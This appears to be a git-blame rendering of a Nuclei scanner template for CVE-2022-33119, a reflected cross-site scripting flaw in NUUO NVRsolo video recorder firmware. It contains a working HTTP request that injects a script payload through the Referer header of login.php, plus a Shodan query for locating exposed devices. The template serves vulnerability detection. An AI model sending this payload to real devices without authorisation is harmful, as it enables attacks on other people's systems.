2022-07-28 14:47:17 +00:00
|
|
|
id: CVE-2022-33119
|
|
|
|
|
|
|
|
info:
|
2022-09-16 19:50:10 +00:00
|
|
|
name: NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting
|
2022-07-28 14:47:17 +00:00
|
|
|
author: arafatansari
|
2022-09-16 20:03:07 +00:00
|
|
|
severity: medium
|
2022-07-28 14:47:17 +00:00
|
|
|
description: |
|
2022-09-16 19:50:10 +00:00
|
|
|
NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php.
|
2023-09-06 11:59:08 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest security patch or upgrade to a non-vulnerable version of the NUUO NVRsolo Video Recorder software.
|
2022-07-29 08:47:39 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/badboycxcc/nuuo-xss/blob/main/README.md
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-33119
|
2022-07-29 16:22:50 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
|
|
|
cve-id: CVE-2022-33119
|
|
|
|
cwe-id: CWE-79
|
2023-08-31 11:46:18 +00:00
|
|
|
epss-score: 0.02006
|
|
|
|
epss-percentile: 0.87424
|
2023-09-06 11:59:08 +00:00
|
|
|
cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:*
|
2022-07-28 14:47:17 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-09-06 11:59:08 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: nuuo
|
|
|
|
product: nvrsolo_firmware
|
2023-09-06 11:59:08 +00:00
|
|
|
shodan-query: http.html:"NVRsolo"
|
2022-07-29 08:47:39 +00:00
|
|
|
tags: cve,cve2022,nvrsolo,xss
|
2022-07-28 14:47:17 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-07-28 14:47:17 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /login.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
2022-07-29 08:47:39 +00:00
|
|
|
Referer: "><script>alert(document.domain)</script><"
|
2022-07-28 14:47:17 +00:00
|
|
|
|
|
|
|
language=en&user=user&pass=pass&submit=Login
|
|
|
|
|
|
|
|
matchers:
|
2022-07-29 08:47:39 +00:00
|
|
|
- type: dsl
|
|
|
|
dsl:
|
2023-06-19 21:10:30 +00:00
|
|
|
- 'contains(header, "text/html")'
|
2022-07-29 08:47:39 +00:00
|
|
|
- 'status_code == 200'
|
|
|
|
- contains(body,'<script>alert(document.domain)</script><\"?cmd=')
|
|
|
|
condition: and
|